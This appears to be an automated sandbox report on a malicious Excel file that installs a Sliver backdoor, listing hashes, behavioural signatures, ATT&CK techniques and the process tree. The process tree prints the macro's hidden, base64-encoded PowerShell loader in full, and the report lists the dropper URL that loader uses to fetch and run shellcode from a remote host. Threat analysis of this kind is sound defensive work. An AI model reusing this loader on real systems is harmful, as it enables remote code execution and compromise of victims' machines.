sliver | 9c43394c6d2ba2f266fe7971fd4ad35248bf358483b80ada5d649dd54548f169

General

Target

9c43394c6d2ba2f266fe7971fd4ad35248bf358483b80ada5d649dd54548f169.xls
Size

46KB
MD5

ac77a8bda447bdb92699c17902228d62
SHA1

57f5a4c110dbe515fb6732db7694f1047e744d33
SHA256

9c43394c6d2ba2f266fe7971fd4ad35248bf358483b80ada5d649dd54548f169
SHA512

90836243e05d12c87fd5cbf1369fe371e42e52a720fce388b6f21b690b5078b68d79d0197b8725e391fd15db5143d57c5515ab90cb9cc32f04a0fa7ebaa56d49
SSDEEP

768:/4SFsv66g3KnF439NKC54kkGfn+cL2XdA8YRtukODXwXqt7sNAQYzKEm8ZRu9Uzp:ASFsv66g3KnF439NKC54kkGfn+cL2Xd+

Score

10^/10

sliver backdoor execution trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://194.182.164.149:8080/fontawesome.woff

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

powershell.exe

description	pid	pid_target	Process	procid_target
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	3208	1516	powershell.exe	82

Sliver RAT v2 5 IoCs

Processes:

resource	yara_rule
behavioral2/memory/3208-63-0x00000236479B0000-0x000002364842E000-memory.dmp	SliverRAT_v2
behavioral2/memory/3208-66-0x0000023648EB0000-0x0000023649996000-memory.dmp	SliverRAT_v2
behavioral2/memory/3208-65-0x0000023648EB0000-0x0000023649996000-memory.dmp	SliverRAT_v2
behavioral2/memory/3208-67-0x0000023648EB0000-0x0000023649996000-memory.dmp	SliverRAT_v2
behavioral2/memory/3208-64-0x0000023648EB0000-0x0000023649996000-memory.dmp	SliverRAT_v2

Sliver family
sliver
SliverRAT
SliverRAT is an open source Adversary Emulation Framework.
trojan backdoor sliver

Blocklisted process makes network request 22 IoCs

Processes:

powershell.exe

flow	pid	Process
22	3208	powershell.exe
23	3208	powershell.exe
27	3208	powershell.exe
35	3208	powershell.exe
36	3208	powershell.exe
37	3208	powershell.exe
38	3208	powershell.exe
39	3208	powershell.exe
40	3208	powershell.exe
46	3208	powershell.exe
54	3208	powershell.exe
55	3208	powershell.exe
56	3208	powershell.exe
57	3208	powershell.exe
58	3208	powershell.exe
59	3208	powershell.exe
60	3208	powershell.exe
61	3208	powershell.exe
62	3208	powershell.exe
63	3208	powershell.exe
64	3208	powershell.exe
65	3208	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

Processes:

powershell.exe

pid	Process
3208	powershell.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

EXCEL.EXE

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

EXCEL.EXE

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

EXCEL.EXE

pid	Process
1516	EXCEL.EXE

Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

powershell.exe

pid	Process
3208	powershell.exe
3208	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description	pid	Process
Token: SeDebugPrivilege	3208	powershell.exe

Suspicious use of SetWindowsHookEx 12 IoCs

Processes:

EXCEL.EXE

pid	Process
1516	EXCEL.EXE
1516	EXCEL.EXE
1516	EXCEL.EXE
1516	EXCEL.EXE
1516	EXCEL.EXE
1516	EXCEL.EXE
1516	EXCEL.EXE
1516	EXCEL.EXE
1516	EXCEL.EXE
1516	EXCEL.EXE
1516	EXCEL.EXE
1516	EXCEL.EXE

Suspicious use of WriteProcessMemory 6 IoCs

Processes:

EXCEL.EXEpowershell.execsc.exe

description	pid	Process	procid_target
PID 1516 wrote to memory of 3208	1516	EXCEL.EXE	85
PID 1516 wrote to memory of 3208	1516	EXCEL.EXE	85
PID 3208 wrote to memory of 2980	3208	powershell.exe	88
PID 3208 wrote to memory of 2980	3208	powershell.exe	88
PID 2980 wrote to memory of 2736	2980	csc.exe	90
PID 2980 wrote to memory of 2736	2980	csc.exe	90

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\9c43394c6d2ba2f266fe7971fd4ad35248bf358483b80ada5d649dd54548f169.xls"
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1516
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -nop -w hidden -Enc JABXAGkAbgAzADIAIAA9ACAAQAAiAA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFcAaQBuADMAMgAgAHsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAiACkAXQANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAANAAoAIAAgACAAIAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAANAAoAIAAgACAAIAB1AGkAbgB0ACAAZgBsAEEAbABsAG8AYwBhAHQAaQBvAG4AVAB5AHAAZQAsAA0ACgAgACAAIAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAiACwAIABDAGgAYQByAFMAZQB0AD0AQwBoAGEAcgBTAGUAdAAuAEEAbgBzAGkAKQBdAA0ACgBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQAQQB0AHQAcgBpAGIAdQB0AGUAcwAsAA0ACgAgACAAIAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAANAAoAIAAgACAAIABJAG4AdABQAHQAcgAgAGwAcABTAHQAYQByAHQAQQBkAGQAcgBlAHMAcwAsAA0ACgAgACAAIAAgAEkAbgB0AFAAdAByACAAbABwAFAAYQByAGEAbQBlAHQAZQByACwADQAKACAAIAAgACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQASQBkACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgAsACAAUwBlAHQATABhAHMAdABFAHIAcgBvAHIAPQB0AHIAdQBlACkAXQANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAVQBJAG4AdAAzADIAIABXAGEAaQB0AEYAbwByAFMAaQBuAGcAbABlAE8AYgBqAGUAYwB0ACgADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABoAEgAYQBuAGQAbABlACwADQAKACAAIAAgACAAVQBJAG4AdAAzADIAIABkAHcATQBpAGwAbABpAHMAZQBjAG8AbgBkAHMAKQA7AA0ACgB9AA0ACgAiAEAADQAKAEEAZABkAC0AVAB5AHAAZQAgACQAVwBpAG4AMwAyAA0ACgANAAoAIwAgAEkAUwBDAHsAaABlAGMAYQByAG0AZQBuAF8AdwBhAHMAXwBoAGUAcgBlAH0ADQAKAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAHIAdgBlAHIAQwBlAHIAdABpAGYAaQBjAGEAdABlAFYAYQBsAGkAZABhAHQAaQBvAG4AQwBhAGwAbABiAGEAYwBrACAAPQAgAHsAJAB0AHIAdQBlAH0AIAA7AA0ACgAkAHMAaABlAGwAbABjAG8AZABlACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAEwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAiAGgAdAB0AHAAcwA6AC8ALwAxADkANAAuADEAOAAyAC4AMQA2ADQALgAxADQAOQA6ADgAMAA4ADAALwBmAG8AbgB0AGEAdwBlAHMAbwBtAGUALgB3AG8AZgBmACIAKQANAAoAaQBmACAAKAAkAHMAaABlAGwAbABjAG8AZABlACAALQBlAHEAIAAkAG4AdQBsAGwAKQAgAHsARQB4AGkAdAB9ADsADQAKACQAcwBpAHoAZQAgAD0AIAAkAHMAaABlAGwAbABjAG8AZABlAC4ATABlAG4AZwB0AGgADQAKAA0ACgBbAEkAbgB0AFAAdAByAF0AJABhAGQAZAByACAAPQAgAFsAVwBpAG4AMwAyAF0AOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsACQAcwBpAHoAZQAsADAAeAAxADAAMAAwACwAMAB4ADQAMAApADsADQAKAFsAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMALgBNAGEAcgBzAGgAYQBsAF0AOgA6AEMAbwBwAHkAKAAkAHMAaABlAGwAbABjAG8AZABlACwAIAAwACwAIAAkAGEAZABkAHIALAAgACQAcwBpAHoAZQApAA0ACgAkAHQAaABhAG4AZABsAGUAPQBbAFcAaQBuADMAMgBdADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwACwAJABhAGQAZAByACwAMAAsADAALAAwACkAOwANAAoAWwBXAGkAbgAzADIAXQA6ADoAVwBhAGkAdABGAG8AcgBTAGkAbgBnAGwAZQBPAGIAagBlAGMAdAAoACQAdABoAGEAbgBkAGwAZQAsACAAWwB1AGkAbgB0ADMAMgBdACIAMAB4AEYARgBGAEYARgBGAEYARgAiACkA
  2⤵
  - Process spawned unexpected child process
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3208
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\1c0unc31\1c0unc31.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2980
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES99B0.tmp" "c:\Users\Admin\AppData\Local\Temp\1c0unc31\CSC1DCDE9CDD2334C70A06FA69D2F36661B.TMP"
      4⤵
      PID:2736

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\1c0unc31\1c0unc31.dll

Filesize
3KB

MD5
1f9b9e3a921b97b82d1a1718833acdfd

SHA1
e9b97af14c649fe76be247225eae1d554c4788fe

SHA256
b683769e25ccc5ba5eea1387a6f273a41ebdd65db9772d9ae4c82089030d501b

SHA512
da3b85d78a9688a6491cf9b3f16a4f22e8e29868f9b6cc920d9a239a3ab6f59bc8ee011e8272281668af01892baf81fe64b4ef99bdabc3e7a719bd3630f87124

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES99B0.tmp

Filesize
1KB

MD5
f2923132478566442349b02f14b59b1b

SHA1
dc87c72f4e95d8308b21e3d5db7f8b5091ffb6c2

SHA256
f72643c48dfc2ae19c4c5f899088c76f9165edd4754adab0be9dbb7b72380438

SHA512
69839a56c33dac1215f1fa7f0ef12015460696dc3ec8de5e6ab0fa152876b014617ebc4dcd2477b3838dbaba6bdd607b1ac465cf10662834061b0ee2daa213e8

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hfvvvwbg.3cy.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms

Filesize
1KB

MD5
f11a31437010461dc74566376422d661

SHA1
033744ad82170de31d92ae54fce67333053b6a0f

SHA256
df78a3e5c5d46704adb5509595cede471cda31fa4f6d731d7036a845bbe153bf

SHA512
65ead145f0baafbee8feef169e03393dc5384809628a08e847227cd67e3ee7d6b58cd9e7c8ae17c3046da1e0faca2c3ab91c382d6e84f42dc5156c44c6222526

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\1c0unc31\1c0unc31.0.cs

Filesize
631B

MD5
f4dd5c682eb7b3b679f084261bfc7c4c

SHA1
70f75d7a4e42c185eb09139ed3c6f7338a2219c2

SHA256
2908bfece2edd241dc4f7cc26608c3254f7e5b896a38114618d56b65d4fc4319

SHA512
8f91148a6bd15f8182ef00b3e75b008eacda414852e8169112013377e4b9b88e1a0be73c8e0c212b8c0a51c24fbb2849c44d742f6019c9c5bf0dfb0e28a1b83d

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\1c0unc31\1c0unc31.cmdline

Filesize
369B

MD5
6500deb739fb495a50ec437763de89de

SHA1
ce418d331cb961492ea54eb554f732af1f491657

SHA256
d90f986b14675c1cc8ac3162498dfe7c9cfe0c3dd1d7113103a89c3773920bac

SHA512
98bbcfb25848d07c98782be5269d18368aaf9033f556178af63dcc5d8ce6abb8dd603cbe3da5c4655527d37f8d54fa7b53347a298e83918ea025ca9bd6942a99

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\1c0unc31\CSC1DCDE9CDD2334C70A06FA69D2F36661B.TMP

Filesize
652B

MD5
d5d303badeefc188d6f77092136faa3a

SHA1
9cdc70eefb3f0dbfa19e516636d88a39d8d2f888

SHA256
77e6ebe025ef7009a9bfcf3539ca52e17ce3ed6ca70a558e37d868c2deb304d8

SHA512
b3914799db43b87952e6036514f0c1e797dc676f7c268c5483023e180706b105a37cf8bc7ce69d7acf2429649ca88ab98fc6ddb3ff7d7ec0c9337fe41bfc992b

Download Submit
memory/1516-14-0x00007FFC6DD70000-0x00007FFC6DF65000-memory.dmp

Filesize
2.0MB

Download
memory/1516-15-0x00007FFC6DD70000-0x00007FFC6DF65000-memory.dmp

Filesize
2.0MB

Download
memory/1516-1-0x00007FFC6DE0D000-0x00007FFC6DE0E000-memory.dmp

Filesize
4KB

Download
memory/1516-18-0x00007FFC2BD00000-0x00007FFC2BD10000-memory.dmp

Filesize
64KB

Download
memory/1516-19-0x00007FFC6DD70000-0x00007FFC6DF65000-memory.dmp

Filesize
2.0MB

Download
memory/1516-17-0x00007FFC6DD70000-0x00007FFC6DF65000-memory.dmp

Filesize
2.0MB

Download
memory/1516-12-0x00007FFC6DD70000-0x00007FFC6DF65000-memory.dmp

Filesize
2.0MB

Download
memory/1516-11-0x00007FFC6DD70000-0x00007FFC6DF65000-memory.dmp

Filesize
2.0MB

Download
memory/1516-10-0x00007FFC6DD70000-0x00007FFC6DF65000-memory.dmp

Filesize
2.0MB

Download
memory/1516-8-0x00007FFC6DD70000-0x00007FFC6DF65000-memory.dmp

Filesize
2.0MB

Download
memory/1516-7-0x00007FFC6DD70000-0x00007FFC6DF65000-memory.dmp

Filesize
2.0MB

Download
memory/1516-6-0x00007FFC2DDF0000-0x00007FFC2DE00000-memory.dmp

Filesize
64KB

Download
memory/1516-0-0x00007FFC2DDF0000-0x00007FFC2DE00000-memory.dmp

Filesize
64KB

Download
memory/1516-24-0x00007FFC6DD70000-0x00007FFC6DF65000-memory.dmp

Filesize
2.0MB

Download
memory/1516-23-0x00007FFC6DD70000-0x00007FFC6DF65000-memory.dmp

Filesize
2.0MB

Download
memory/1516-16-0x00007FFC2BD00000-0x00007FFC2BD10000-memory.dmp

Filesize
64KB

Download
memory/1516-76-0x00007FFC6DD70000-0x00007FFC6DF65000-memory.dmp

Filesize
2.0MB

Download
memory/1516-13-0x00007FFC6DD70000-0x00007FFC6DF65000-memory.dmp

Filesize
2.0MB

Download
memory/1516-9-0x00007FFC6DD70000-0x00007FFC6DF65000-memory.dmp

Filesize
2.0MB

Download
memory/1516-2-0x00007FFC2DDF0000-0x00007FFC2DE00000-memory.dmp

Filesize
64KB

Download
memory/1516-5-0x00007FFC6DD70000-0x00007FFC6DF65000-memory.dmp

Filesize
2.0MB

Download
memory/1516-4-0x00007FFC2DDF0000-0x00007FFC2DE00000-memory.dmp

Filesize
64KB

Download
memory/1516-3-0x00007FFC2DDF0000-0x00007FFC2DE00000-memory.dmp

Filesize
64KB

Download
memory/1516-61-0x00007FFC6DD70000-0x00007FFC6DF65000-memory.dmp

Filesize
2.0MB

Download
memory/1516-62-0x00007FFC6DE0D000-0x00007FFC6DE0E000-memory.dmp

Filesize
4KB

Download
memory/3208-63-0x00000236479B0000-0x000002364842E000-memory.dmp

Filesize
10.5MB

Download
memory/3208-66-0x0000023648EB0000-0x0000023649996000-memory.dmp

Filesize
10.9MB

Download
memory/3208-65-0x0000023648EB0000-0x0000023649996000-memory.dmp

Filesize
10.9MB

Download
memory/3208-67-0x0000023648EB0000-0x0000023649996000-memory.dmp

Filesize
10.9MB

Download
memory/3208-64-0x0000023648EB0000-0x0000023649996000-memory.dmp

Filesize
10.9MB

Download
memory/3208-57-0x0000023647080000-0x0000023647088000-memory.dmp

Filesize
32KB

Download
memory/3208-39-0x0000023647090000-0x00000236470B2000-memory.dmp

Filesize
136KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads